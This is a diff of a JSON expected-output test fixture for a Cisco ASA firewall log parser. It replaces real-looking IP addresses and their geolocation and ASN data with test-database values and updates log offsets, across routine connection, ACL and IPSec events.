@@ -2559,7 +2549,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "notification", - "log.offset": 7446, + "log.offset": 7536, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -2606,7 +2596,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "notification", - "log.offset": 7563, + "log.offset": 7653, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -2653,7 +2643,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "notification", - "log.offset": 7699, + "log.offset": 7789, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -2681,18 +2671,14 @@ "cisco.asa.destination_interface": "server.deflan", "cisco.asa.message_id": "302304", "cisco.asa.source_interface": "server.deflan", - "destination.address": "2.3.4.5", - "destination.as.number": 3215, - "destination.as.organization.name": "Orange", - "destination.geo.city_name": "Clermont-Ferrand", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "FR", - "destination.geo.country_name": "France", - "destination.geo.location.lat": 45.7838, - "destination.geo.location.lon": 3.0966, - "destination.geo.region_iso_code": "FR-63", - "destination.geo.region_name": "Puy-de-D\u00f4me", - "destination.ip": "2.3.4.5", + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.port": 9101, "event.action": "flow-expiration", "event.category": [ 
@@ -2704,7 +2690,7 @@ "event.end": "2021-04-27T04:12:23.000-02:00", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:1.2.3.4/54242 to server.deflan:2.3.4.5/9101 duration 1:00:02 bytes 245 Connection timeout", + "event.original": "%ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:81.2.69.143/54242 to server.deflan:67.43.156.12/9101 duration 1:00:02 bytes 245 Connection timeout", "event.reason": "Connection timeout", "event.severity": 6, "event.start": "2021-04-27T05:12:21.000Z", @@ -2717,9 +2703,9 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 7808, + "log.offset": 7898, "network.bytes": 245, - "network.community_id": "1:GUlUhGicslkTpg27XLqbp4L0H68=", + "network.community_id": "1:DTKtr5ZYYVZ5CGRDZjqE7Sk+MJQ=", "network.iana_number": 6, "network.transport": "tcp", "observer.egress.interface.name": "server.deflan", @@ -2732,20 +2718,20 @@ "dev01" ], "related.ip": [ - "1.2.3.4", - "2.3.4.5" + "67.43.156.12", + "81.2.69.143" ], "service.type": "cisco", - "source.address": "1.2.3.4", - "source.geo.city_name": "Moscow", + "source.address": "81.2.69.143", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "RU", - "source.geo.country_name": "Russia", - "source.geo.location.lat": 55.7527, - "source.geo.location.lon": 37.6172, - "source.geo.region_iso_code": "RU-MOW", - "source.geo.region_name": "Moscow", - "source.ip": "1.2.3.4", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "source.port": 54242, "tags": [ "cisco-asa", 
@@ -2780,7 +2766,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "warning", - "log.offset": 8003, + "log.offset": 8102, "network.community_id": "1:B0rqhFg9+Gx1GmU4JRhiyO3+xmE=", "network.iana_number": 6, "network.transport": "tcp", @@ -2812,16 +2798,6 @@ "cisco.asa.rule_name": "testrulename", "cisco.asa.source_interface": "insideintf", "destination.address": "195.122.12.242", - "destination.as.number": 12578, - "destination.as.organization.name": "SIA Tet", - "destination.geo.city_name": "Riga", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "LV", - "destination.geo.country_name": "Latvia", - "destination.geo.location.lat": 56.9496, - "destination.geo.location.lon": 24.0978, - "destination.geo.region_iso_code": "LV-RIX", - "destination.geo.region_name": "Riga", "destination.ip": "195.122.12.242", "destination.port": 53, "event.action": "firewall-rule", @@ -2844,7 +2820,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "notification", - "log.offset": 8160, + "log.offset": 8259, "network.iana_number": 6, "network.transport": "tcp", "observer.egress.interface.name": "OUTSIDE", @@ -2891,7 +2867,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "notification", - "log.offset": 8353, + "log.offset": 8452, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -2929,7 +2905,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "notification", - "log.offset": 8421, + "log.offset": 8520, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -2974,7 +2950,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "notification", - "log.offset": 8528, + "log.offset": 8627, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", 
@@ -3017,7 +2993,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 8623, + "log.offset": 8722, "network.protocol": "https", "observer.egress.interface.name": "FCD-FS-LAN", "observer.hostname": "dev01", @@ -3065,7 +3041,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 8746, + "log.offset": 8845, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -3113,7 +3089,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 8849, + "log.offset": 8948, "network.protocol": "ssh", "observer.egress.interface.name": "FCD-FS-LAN", "observer.hostname": "dev01", @@ -3161,7 +3137,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 8971, + "log.offset": 9070, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -3194,7 +3170,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-5-713049: Group = 91.240.17.178, IP = 91.240.17.178, Security negotiation complete for LAN-to-LAN Group (91.240.17.178) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d", + "event.original": "%ASA-5-713049: Group = 81.2.69.143, IP = 81.2.69.143, Security negotiation complete for LAN-to-LAN Group (81.2.69.143) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d", "event.severity": 5, "event.timezone": "-02:00", "event.type": [ @@ -3204,7 +3180,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "notification", - "log.offset": 9077, + "log.offset": 9176, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", 
@@ -3213,21 +3189,19 @@ "dev01" ], "related.ip": [ - "91.240.17.178" + "81.2.69.143" ], "service.type": "cisco", - "source.address": "91.240.17.178", - "source.as.number": 201126, - "source.as.organization.name": "CDW Ltd", + "source.address": "81.2.69.143", "source.geo.city_name": "London", "source.geo.continent_name": "Europe", "source.geo.country_iso_code": "GB", "source.geo.country_name": "United Kingdom", - "source.geo.location.lat": 51.5888, - "source.geo.location.lon": -0.0247, + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.region_iso_code": "GB-ENG", "source.geo.region_name": "England", - "source.ip": "91.240.17.178", + "source.ip": "81.2.69.143", "tags": [ "cisco-asa", "forwarded" @@ -3236,19 +3210,17 @@ { "cisco.asa.message_id": "113019", "cisco.asa.session_type": "LAN-to-LAN", - "destination.address": "91.240.17.178", - "destination.as.number": 201126, - "destination.as.organization.name": "CDW Ltd", + "destination.address": "81.2.69.143", "destination.bytes": 1216163, "destination.geo.city_name": "London", "destination.geo.continent_name": "Europe", "destination.geo.country_iso_code": "GB", "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 51.5888, - "destination.geo.location.lon": -0.0247, + "destination.geo.location.lat": 51.5142, + "destination.geo.location.lon": -0.0931, "destination.geo.region_iso_code": "GB-ENG", "destination.geo.region_name": "England", - "destination.ip": "91.240.17.178", + "destination.ip": "81.2.69.143", "event.action": "firewall-rule", "event.category": [ "network" 
@@ -3259,7 +3231,7 @@ "event.end": "2021-04-27T02:03:03.000-02:00", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-4-113019: Group = 91.240.17.178, Username = 91.240.17.178, IP = 91.240.17.178, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested", + "event.original": "%ASA-4-113019: Group = 81.2.69.143, Username = 81.2.69.143, IP = 81.2.69.143, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested", "event.reason": "User Requested", "event.severity": 4, "event.start": "2021-04-27T03:30:47.000Z", @@ -3271,7 +3243,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "warning", - "log.offset": 9288, + "log.offset": 9381, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -3280,15 +3252,15 @@ "dev01" ], "related.ip": [ - "91.240.17.178" + "81.2.69.143" ], "related.user": [ - "91.240.17.178" + "81.2.69.143" ], "service.type": "cisco", "source.bytes": 297103, - "source.user.group.name": "91.240.17.178", - "source.user.name": "91.240.17.178", + "source.user.group.name": "81.2.69.143", + "source.user.name": "81.2.69.143", "tags": [ "cisco-asa", "forwarded" @@ -3316,7 +3288,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "warning", - "log.offset": 9527, + "log.offset": 9614, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -3350,7 +3322,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-6-716002: Group another-policy User testuser IP 8.8.8.8 WebVPN session terminated: User Requested.", + "event.original": "%ASA-6-716002: Group another-policy User testuser IP 175.16.199.1 WebVPN session terminated: User Requested.", "event.reason": "User Requested", "event.severity": 6, "event.timezone": "-02:00", 
@@ -3361,7 +3333,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 9680, + "log.offset": 9767, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -3370,21 +3342,22 @@ "dev01" ], "related.ip": [ - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "testuser" ], "service.type": "cisco", - "source.address": "8.8.8.8", - "source.as.number": 15169, - "source.as.organization.name": "Google LLC", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "8.8.8.8", + "source.address": "175.16.199.1", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "source.user.name": "testuser", "tags": [ "cisco-asa", @@ -3413,7 +3386,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 9807, + "log.offset": 9899, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", 
@@ -3440,16 +3413,6 @@ "cisco.asa.destination_interface": "outside", "cisco.asa.message_id": "710003", "destination.address": "195.74.114.34", - "destination.as.number": 8468, - "destination.as.organization.name": "Entanet", - "destination.geo.city_name": "Stoke Newington", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "GB", - "destination.geo.country_name": "United Kingdom", - "destination.geo.location.lat": 51.5638, - "destination.geo.location.lon": -0.0765, - "destination.geo.region_iso_code": "GB-HCK", - "destination.geo.region_name": "Hackney", "destination.ip": "195.74.114.34", "destination.port": 23, "event.action": "firewall-rule", @@ -3460,7 +3423,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-3-710003: TCP access denied by ACL from 104.46.88.19/6370 to outside:195.74.114.34/23", + "event.original": "%ASA-3-710003: TCP access denied by ACL from 67.43.156.13/6370 to outside:195.74.114.34/23", "event.outcome": "failure", "event.severity": 3, "event.timezone": "-02:00", @@ -3472,8 +3435,8 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "error", - "log.offset": 9934, - "network.community_id": "1:9NRUY+1nxDxjlLBwQoakpBYA9sc=", + "log.offset": 10026, + "network.community_id": "1:HGV6Jx3H/I6pH7ssIeSFtuaT99I=", "network.iana_number": 6, "network.transport": "tcp", "observer.egress.interface.name": "outside", 
@@ -3485,22 +3448,18 @@ "dev01" ], "related.ip": [ - "104.46.88.19", - "195.74.114.34" + "195.74.114.34", + "67.43.156.13" ], "service.type": "cisco", - "source.address": "104.46.88.19", - "source.as.number": 8075, - "source.as.organization.name": "Microsoft Corporation", - "source.geo.city_name": "Dublin", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "IE", - "source.geo.country_name": "Ireland", - "source.geo.location.lat": 53.3338, - "source.geo.location.lon": -6.2488, - "source.geo.region_iso_code": "IE-L", - "source.geo.region_name": "Leinster", - "source.ip": "104.46.88.19", + "source.address": "67.43.156.13", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.port": 6370, "tags": [ "cisco-asa", @@ -3522,7 +3481,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:91.240.17.178/8888 to destinationInterfaceName:192.168.2.2/123123 locally", + "event.original": "%ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:81.2.69.143/8888 to destinationInterfaceName:192.168.2.2/123123 locally", "event.outcome": "unknown", "event.severity": 5, "event.timezone": "-02:00", @@ -3534,7 +3493,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "notification", - "log.offset": 10048, + "log.offset": 10140, "network.protocol": "tcp", "observer.egress.interface.name": "destinationInterfaceName", "observer.hostname": "dev01", 
@@ -3547,21 +3506,19 @@ ], "related.ip": [ "192.168.2.2", - "91.240.17.178" + "81.2.69.143" ], "service.type": "cisco", - "source.address": "91.240.17.178", - "source.as.number": 201126, - "source.as.organization.name": "CDW Ltd", + "source.address": "81.2.69.143", "source.geo.city_name": "London", "source.geo.continent_name": "Europe", "source.geo.country_iso_code": "GB", "source.geo.country_name": "United Kingdom", - "source.geo.location.lat": 51.5888, - "source.geo.location.lon": -0.0247, + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.region_iso_code": "GB-ENG", "source.geo.region_name": "England", - "source.ip": "91.240.17.178", + "source.ip": "81.2.69.143", "source.port": 8888, "tags": [ "cisco-asa", @@ -3579,7 +3536,7 @@ "event.code": 434002, "event.dataset": "cisco.asa", "event.module": "cisco", - "event.original": "%ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:91.240.17.138/8888 to destinationInterfaceName:192.168.2.2/514514", + "event.original": "%ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:67.43.156.15/8888 to destinationInterfaceName:192.168.2.2/514514", "event.outcome": "unknown", "event.severity": 4, "event.timezone": "-02:00", @@ -3587,7 +3544,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "warning", - "log.offset": 10266, + "log.offset": 10356, "network.protocol": "tcp", "observer.egress.interface.name": "destinationInterfaceName", "observer.hostname": "dev01", 
@@ -3600,21 +3557,17 @@ ], "related.ip": [ "192.168.2.2", - "91.240.17.138" + "67.43.156.15" ], "service.type": "cisco", - "source.address": "91.240.17.138", - "source.as.number": 201126, - "source.as.organization.name": "CDW Ltd", - "source.geo.city_name": "London", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "GB", - "source.geo.country_name": "United Kingdom", - "source.geo.location.lat": 51.5888, - "source.geo.location.lon": -0.0247, - "source.geo.region_iso_code": "GB-ENG", - "source.geo.region_name": "England", - "source.ip": "91.240.17.138", + "source.address": "67.43.156.15", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.15", "source.port": 8888, "tags": [ "cisco-asa", @@ -3635,7 +3588,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:91.240.17.178/7777 to 192.168.2.2/123412", + "event.original": "%ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:81.2.69.143/7777 to 192.168.2.2/123412", "event.outcome": "failure", "event.reason": "Failed to locate egress interface", "event.severity": 6, @@ -3648,7 +3601,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 10433, + "log.offset": 10522, "network.protocol": "tcp", "observer.hostname": "dev01", "observer.ingress.interface.name": "sourceInterfaceName", 
@@ -3660,21 +3613,19 @@ ], "related.ip": [ "192.168.2.2", - "91.240.17.178" + "81.2.69.143" ], "service.type": "cisco", - "source.address": "91.240.17.178", - "source.as.number": 201126, - "source.as.organization.name": "CDW Ltd", + "source.address": "81.2.69.143", "source.geo.city_name": "London", "source.geo.continent_name": "Europe", "source.geo.country_iso_code": "GB", "source.geo.country_name": "United Kingdom", - "source.geo.location.lat": 51.5888, - "source.geo.location.lon": -0.0247, + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.region_iso_code": "GB-ENG", "source.geo.region_name": "England", - "source.ip": "91.240.17.178", + "source.ip": "81.2.69.143", "source.port": 7777, "tags": [ "cisco-asa", @@ -3696,7 +3647,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:91.240.17.178/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number", + "event.original": "%ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:81.2.69.143/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number", "event.reason": "Duplicate TCP SYN with different initial sequence number", "event.severity": 4, "event.timezone": "-02:00", @@ -3707,7 +3658,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "warning", - "log.offset": 10584, + "log.offset": 10671, "network.protocol": "tcp", "observer.egress.interface.name": "destinationInterfaceName", "observer.hostname": "dev01", 
@@ -3720,21 +3671,19 @@ ], "related.ip": [ "192.168.2.2", - "91.240.17.178" + "81.2.69.143" ], "service.type": "cisco", - "source.address": "91.240.17.178", - "source.as.number": 201126, - "source.as.organization.name": "CDW Ltd", + "source.address": "81.2.69.143", "source.geo.city_name": "London", "source.geo.continent_name": "Europe", "source.geo.country_iso_code": "GB", "source.geo.country_name": "United Kingdom", - "source.geo.location.lat": 51.5888, - "source.geo.location.lon": -0.0247, + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.region_iso_code": "GB-ENG", "source.geo.region_name": "England", - "source.ip": "91.240.17.178", + "source.ip": "81.2.69.143", "source.port": 7777, "tags": [ "cisco-asa", @@ -3750,7 +3699,7 @@ "event.code": 602303, "event.dataset": "cisco.asa", "event.module": "cisco", - "event.original": "%ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been created.", + "event.original": "%ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.143 and 192.168.2.2 (user= admin) has been created.", "event.outcome": "success", "event.severity": 6, "event.timezone": "-02:00", @@ -3758,7 +3707,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 10775, + "log.offset": 10860, "network.direction": "outbound", "network.type": "ipsec", "observer.hostname": "dev01", 
@@ -3770,24 +3719,22 @@ ], "related.ip": [ "192.168.2.2", - "91.240.17.178" + "81.2.69.143" ], "related.user": [ "admin" ], "service.type": "cisco", - "source.address": "91.240.17.178", - "source.as.number": 201126, - "source.as.organization.name": "CDW Ltd", + "source.address": "81.2.69.143", "source.geo.city_name": "London", "source.geo.continent_name": "Europe", "source.geo.country_iso_code": "GB", "source.geo.country_name": "United Kingdom", - "source.geo.location.lat": 51.5888, - "source.geo.location.lon": -0.0247, + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.region_iso_code": "GB-ENG", "source.geo.region_name": "England", - "source.ip": "91.240.17.178", + "source.ip": "81.2.69.143", "tags": [ "cisco-asa", "forwarded" @@ -3807,7 +3754,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been deleted.", + "event.original": "%ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.143 and 192.168.2.2 (user= admin) has been deleted.", "event.outcome": "success", "event.severity": 6, "event.timezone": "-02:00", @@ -3821,7 +3768,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 10937, + "log.offset": 11020, "network.direction": "outbound", "network.type": "ipsec", "observer.hostname": "dev01", 
@@ -3833,24 +3780,22 @@ ], "related.ip": [ "192.168.2.2", - "91.240.17.178" + "81.2.69.143" ], "related.user": [ "admin" ], "service.type": "cisco", - "source.address": "91.240.17.178", - "source.as.number": 201126, - "source.as.organization.name": "CDW Ltd", + "source.address": "81.2.69.143", "source.geo.city_name": "London", "source.geo.continent_name": "Europe", "source.geo.country_iso_code": "GB", "source.geo.country_name": "United Kingdom", - "source.geo.location.lat": 51.5888, - "source.geo.location.lon": -0.0247, + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.region_iso_code": "GB-ENG", "source.geo.region_name": "England", - "source.ip": "91.240.17.178", + "source.ip": "81.2.69.143", "tags": [ "cisco-asa", "forwarded" @@ -3870,7 +3815,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-5-750002: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request", + "event.original": "%ASA-5-750002: Local:81.2.69.143:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request", "event.reason": "Received a IKE_INIT_SA request", "event.severity": 5, "event.timezone": "-02:00", @@ -3882,7 +3827,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "notification", - "log.offset": 11099, + "log.offset": 11180, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", 
@@ -3892,24 +3837,22 @@ ], "related.ip": [ "192.168.2.2", - "91.240.17.178" + "81.2.69.143" ], "related.user": [ "admin" ], "service.type": "cisco", - "source.address": "91.240.17.178", - "source.as.number": 201126, - "source.as.organization.name": "CDW Ltd", + "source.address": "81.2.69.143", "source.geo.city_name": "London", "source.geo.continent_name": "Europe", "source.geo.country_iso_code": "GB", "source.geo.country_name": "United Kingdom", - "source.geo.location.lat": 51.5888, - "source.geo.location.lon": -0.0247, + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.region_iso_code": "GB-ENG", "source.geo.region_name": "England", - "source.ip": "91.240.17.178", + "source.ip": "81.2.69.143", "source.port": 7777, "tags": [ "cisco-asa", @@ -3930,7 +3873,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-4-750003: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database", + "event.original": "%ASA-4-750003: Local:81.2.69.143:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database", "event.reason": "Negotiation aborted due to Failed to locate an item in the database", "event.severity": 4, "event.timezone": "-02:00", @@ -3941,7 +3884,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "warning", - "log.offset": 11237, + "log.offset": 11316, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", 
@@ -3951,24 +3894,22 @@ ], "related.ip": [ "192.168.2.2", - "91.240.17.178" + "81.2.69.143" ], "related.user": [ "admin" ], "service.type": "cisco", - "source.address": "91.240.17.178", - "source.as.number": 201126, - "source.as.organization.name": "CDW Ltd", + "source.address": "81.2.69.143", "source.geo.city_name": "London", "source.geo.continent_name": "Europe", "source.geo.country_iso_code": "GB", "source.geo.country_name": "United Kingdom", - "source.geo.location.lat": 51.5888, - "source.geo.location.lon": -0.0247, + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.region_iso_code": "GB-ENG", "source.geo.region_name": "England", - "source.ip": "91.240.17.178", + "source.ip": "81.2.69.143", "source.port": 7777, "tags": [ "cisco-asa", @@ -3987,7 +3928,7 @@ "event.id": "bbe383e88", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-5-713120: Group = 100.60.140.10, IP = 192.128.1.1, PHASE 2 COMPLETED (msgid=bbe383e88)", + "event.original": "%ASA-5-713120: Group = 100.60.140.10, IP = 67.43.156.12, PHASE 2 COMPLETED (msgid=bbe383e88)", "event.outcome": "success", "event.reason": "PHASE 2 COMPLETED", "event.severity": 5, @@ -4000,7 +3941,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "notification", - "log.offset": 11419, + "log.offset": 11496, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", 
@@ -4009,16 +3950,17 @@ "dev01" ], "related.ip": [ - "192.128.1.1" + "67.43.156.12" ], "service.type": "cisco", - "source.address": "192.128.1.1", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "192.128.1.1", + "source.address": "67.43.156.12", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "tags": [ "cisco-asa", "forwarded" @@ -4034,7 +3976,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-5-713202: IP = 192.64.157.61, Duplicate first packet detected. Ignoring packet.", + "event.original": "%ASA-5-713202: IP = 1.128.3.4, Duplicate first packet detected. Ignoring packet.", "event.reason": "Duplicate first packet detected", "event.severity": 5, "event.timezone": "-02:00", @@ -4045,7 +3987,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "notification", - "log.offset": 11539, + "log.offset": 11617, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -4054,16 +3996,13 @@ "dev01" ], "related.ip": [ - "192.64.157.61" + "1.128.3.4" ], "service.type": "cisco", - "source.address": "192.64.157.61", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "192.64.157.61", + "source.address": "1.128.3.4", + "source.as.number": 1221, + "source.as.organization.name": "Telstra Pty Ltd", + "source.ip": "1.128.3.4", "tags": [ "cisco-asa", "forwarded" 
@@ -4079,7 +4018,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-6-713905: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable!", + "event.original": "%ASA-6-713905: Group = 100.60.140.10, IP = 67.43.156.12, All IPSec SA proposals found unacceptable!", "event.outcome": "failure", "event.reason": "All IPSec SA proposals found unacceptable!", "event.severity": 6, @@ -4092,7 +4031,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 11652, + "log.offset": 11726, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -4101,16 +4040,17 @@ "dev01" ], "related.ip": [ - "192.128.1.1" + "67.43.156.12" ], "service.type": "cisco", - "source.address": "192.128.1.1", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "192.128.1.1", + "source.address": "67.43.156.12", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "tags": [ "cisco-asa", "forwarded" @@ -4139,7 +4079,7 @@ "host.hostname": "dev01", "input.type": "log", "log.level": "informational", - "log.offset": 11779, + "log.offset": 11854, "observer.hostname": "dev01", "observer.product": "asa", "observer.type": "firewall", @@ -4163,7 +4103,7 @@ "event.dataset": "cisco.asa", "event.kind": "event", "event.module": "cisco", - "event.original": "%ASA-6-713903: IP = 192.128.1.1, All IPSec SA proposals found unacceptable!", + "event.original": "%ASA-6-713903: IP = 67.43.156.12, All IPSec SA proposals found unacceptable!", "event.severity": 6, "event.timezone": "-02:00", "event.type": [ 
